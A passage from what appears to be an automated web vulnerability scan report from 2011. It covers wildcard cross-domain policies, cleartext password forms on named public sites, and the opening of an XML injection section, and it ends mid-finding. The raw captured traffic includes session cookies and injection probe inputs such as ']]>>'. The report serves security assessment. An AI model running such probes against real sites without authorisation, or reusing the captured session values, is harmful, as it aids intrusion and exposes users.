...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://www.bing.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

6.23. http://a4.bing4.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://a4.bing4.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: a4.bing4.com

Response

HTTP/1.0 200 OK
Cache-Control: private,max-age=0
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Tue, 19 Jul 2011 23:01:40 GMT
Content-Length: 1766
Connection: close
Set-Cookie: _SS=SID=CCF610C6100E4CBA9C084E2CCCED660B; domain=.bing4.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=F6DF14FC715246E9B38F9A207195031D; expires=Thu, 18-Jul-2013 23:01:39 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; expires=Thu, 18-Jul-2013 23:01:39 GMT; domain=.bing4.com; path=/

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://www.bing.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

6.24. http://api.bing.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.bing.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: api.bing.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Content-Length: 348
Content-Type: text/xml
Last-Modified: Tue, 09 Feb 2010 19:32:41 GMT
ETag: 3B4046BBE5F127E45C1A35A93B86C3890000015C
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Tue, 19 Jul 2011 14:28:14 GMT
Connection: close
Set-Cookie: _FS=ui=en-US&mkt=en-US; domain=.bing.com; path=/

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*.bing.com"/>
</allow-from>

...[SNIP]...

6.25. http://ts1.mm.bing.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ts1.mm.bing.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts1.mm.bing.net

Response

HTTP/1.0 200 OK
Content-Length: 1766
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
Date: Tue, 19 Jul 2011 12:23:40 GMT
Connection: close
Cache-Control: public, max-age=3600

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

6.26. http://ts2.mm.bing.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ts2.mm.bing.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts2.mm.bing.net

Response

HTTP/1.0 200 OK
Content-Length: 1766
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
Date: Tue, 19 Jul 2011 12:23:41 GMT
Connection: close
Cache-Control: public, max-age=3600

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

6.27. http://ts3.mm.bing.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ts3.mm.bing.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts3.mm.bing.net

Response

HTTP/1.0 200 OK
Content-Length: 1766
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
Date: Tue, 19 Jul 2011 12:23:49 GMT
Connection: close
Cache-Control: public, max-age=3600

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

6.28. http://ts4.mm.bing.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ts4.mm.bing.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts4.mm.bing.net

Response

HTTP/1.0 200 OK
Content-Length: 1766
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
Date: Tue, 19 Jul 2011 12:23:49 GMT
Connection: close
Cache-Control: public, max-age=3600

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

6.29. http://profile.live.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://profile.live.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: profile.live.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/xml; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-Imf: 0a36844a-00fd-4efb-91e4-3337bf3fc5c4
Set-Cookie: E=P:QqwkiDcUzog=:DUg6QX2uWRNBr/Q+WUc/yg+CrCDGmConIiB1FazUDLA=:F; domain=.live.com; path=/
X-AspNet-Version: 4.0.30319
Set-Cookie: E=P:QqwkiDcUzog=:DUg6QX2uWRNBr/Q+WUc/yg+CrCDGmConIiB1FazUDLA=:F; domain=.live.com; path=/
Set-Cookie: xidseq=2; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Tue, 19-Jul-2011 12:50:24 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Tue, 26-Jul-2011 14:30:24 GMT; path=/
Set-Cookie: sc_clustbl_142=8ccc0e93c93d866c; domain=profile.live.com; expires=Thu, 18-Aug-2011 14:30:24 GMT; path=/
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
X-MSNSERVER: H: BL2XXXXXC645 V: 1 D: 7/13/2011
Date: Tue, 19 Jul 2011 14:30:24 GMT
Connection: close
Content-Length: 400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://msc.wlxrs.com"/>

...[SNIP]...

7. Cleartext submission of password  previous  next
There are 8 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


7.1. http://digg.com/submit  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /submit?phase=2&url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=85df7d9bad8e8d89082fa2e639823b583fe18ba49cd23f778d390a8b56dda4a2

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:30:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=29908 10.2.128.186
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 9012

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

7.2. http://forum.redbyte.ro/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forum.redbyte.ro
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: forum.redbyte.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 17:27:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Content-Length: 61872


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>UNIVERSITATEA DE MEDICINA SI FARMACIE "IULIU HATIEGANU"</title>
<script type="text/JavaScript">
<!-
...[SNIP]...
<td bgcolor="#F0F0F0"><form name="form1" method="post" action="login.aspx">
<table width="100%" border="0" cellspacing="1" cellpadding="5">
...[SNIP]...
<td><input name="parola" type="password" id="parola"></td>
...[SNIP]...

7.3. http://waypointlivingspaces.com/function.mysql-connect  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://waypointlivingspaces.com
Path:   /function.mysql-connect

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /function.mysql-connect HTTP/1.1
Host: waypointlivingspaces.com
Proxy-Connection: keep-alive
Referer: http://waypointlivingspaces.com/locate-dealer?zip=%2527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe2d9d7ad8ae79606f307f1e56494fe09=02isqjnj84clkgrigupugsjs41; has_js=1; __utma=150814896.1501451648.1311108783.1311108783.1311108783.1; __utmb=150814896.6.9.1311109188886; __utmc=150814896; __utmz=150814896.1311108783.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 21:04:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 21:04:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head
...[SNIP]...
<div class="content">
<form action="/function.mysql-connect?destination=function.mysql-connect" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

7.4. http://waypointlivingspaces.com/locate-dealer  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://waypointlivingspaces.com
Path:   /locate-dealer

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /locate-dealer HTTP/1.1
Host: waypointlivingspaces.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://waypointlivingspaces.com/introducing-waypoint/?banner=110523
Cookie: SESSe2d9d7ad8ae79606f307f1e56494fe09=p5hnf2vbssre64l1tg1gvd29q4; has_js=1; __utma=150814896.783126044.1311108308.1311108308.1311108308.1; __utmb=150814896.2.9.1311108318174; __utmc=150814896; __utmz=150814896.1311108308.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:49:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 20:49:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head
...[SNIP]...
<div class="content">
<form action="/locate-dealer?destination=node%2F1456" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

7.5. http://waypointlivingspaces.com/user  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://waypointlivingspaces.com
Path:   /user

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /user HTTP/1.1
Host: waypointlivingspaces.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe2d9d7ad8ae79606f307f1e56494fe09=02isqjnj84clkgrigupugsjs41; has_js=1; __utma=150814896.1501451648.1311108783.1311108783.1311108783.1; __utmb=150814896.2.9.1311108792839; __utmc=150814896; __utmz=150814896.1311108783.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:55:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 20:55:04 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17270

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head
...[SNIP]...
<div id="main-content" class="region clear-block">
<form action="/user" accept-charset="UTF-8" method="post" id="user-login">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="128" size="60" class="form-text required" />
<div class="description">
...[SNIP]...

7.6. http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.boston.com
Path:   /Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links HTTP/1.1
Host: www.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7; __qca=P0-192291824-1311108181675; s_cc=true; s_pv=Boston.com%20home%20page; s_sq=nytbglobe%3D%2526pid%253DBoston.com%252520home%252520page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7%2526ot%253DA; s_ppv=16

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Etag: 71649c45-ebf6-409f-85b6-7e83c3d59026
Content-Type: text/html;charset=UTF-8
Date: Tue, 19 Jul 2011 20:43:47 GMT
Set-Cookie: bcpage=9;expires=Wed, 22-Jun-2016 20:43:47 GMT;path=/;domain=boston.com;
Content-Length: 42969
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="eng">
<!-- Methode uuid: "b12c8144-b20e-11e0-aa83-a59fd6e1b552" -->
<head>
<title
...[SNIP]...
</div>
<form id="lgForm" onsubmit="return false">
<table cellspacing="0" style="margin: 5px; width: 98%;height:200px" id="logtable">
...[SNIP]...
<td><input type="password" style="" maxlength="50" name="pass" id="pass" /></td>
...[SNIP]...

7.7. http://www.facebook.com/r.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /r.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /r.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?&show_faces=true&action=like&font=arial&layout=standard&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110719_0700%26ssh%3DS262080510%26FORM%3DHPFBLK%26mkt%3Den-US%26&width=400&height=80
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.108.49
X-Cnection: close
Date: Tue, 19 Jul 2011 14:58:57 GMT
Content-Length: 30768

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/r.php";window._EagleEyeSeed="TYhN";</script><noscript> <m
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event)&#123;return false;&#125;.call(this,event)!==false &amp;&amp; Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value="fedd9a47074e63aa1e84ddd49e2a5b8d" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

7.8. http://www.nne.aaa.com/en-nne/Pages/Home.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nne.aaa.com
Path:   /en-nne/Pages/Home.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /en-nne/Pages/Home.aspx?zip=05672&referer=www.aaa.com HTTP/1.1
Host: www.nne.aaa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route?rclub=36&rurl=http%3a%2f%2fwww.nne.aaa.com%2fen-nne%2fPages%2fHome.aspx
Cookie: zipcode=05672|AAA|36

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 19:04:25 GMT
Server: Microsoft-IIS/6.0
ACSC: WEB04
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: acezipcode=36|AAA|05672; expires=Thu, 19-Jul-2012 19:04:24 GMT; path=/
Cache-Control: private
Expires: Tue, 19 Jul 2011 19:07:25 GMT
Vary: *, Accept-Encoding, User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 97400


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:o="urn:schemas-microsoft-com:office:office" __expr-val-dir="ltr" dir="ltr">
<
...[SNIP]...
<body scroll="yes" onload="javascript:if (typeof(_spBodyOnLoadWrapper) != 'undefined') _spBodyOnLoadWrapper();" class="">
<form name="aspnetForm" method="post" action="Home.aspx?zip=05672&amp;referer=www.aaa.com" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
his.defaultValue) {this.value=''; this.className='txt txt-username black';}" onBlur="if(this.value=='') {this.value = this.defaultValue; this.className='txt txt-username grey';}"/>
<input type="password" id="Password1" name="Password" value="" class="txt txt-pwd bgimg" size="15" maxlength="30" onfocus="if (this.value.length == 0) {this.className='txt txt-pwd nobgimg'}; setEnd(this);" onBlur="if (this.value.length == 0) {this.className='txt txt-pwd bgimg';} else {this.className='txt txt-pwd nobgimg';}"/>
<input type="submit" name="ctl00$ctl21$g_3ed04e90_5b70_4221_9e62_3ca8a6b20628$ctl00$ButtonLoginH" value="LOGIN" onclick="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBa
...[SNIP]...

8. XML injection  previous  next
There are 269 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.


8.1. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/1px.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-0.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/1px.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

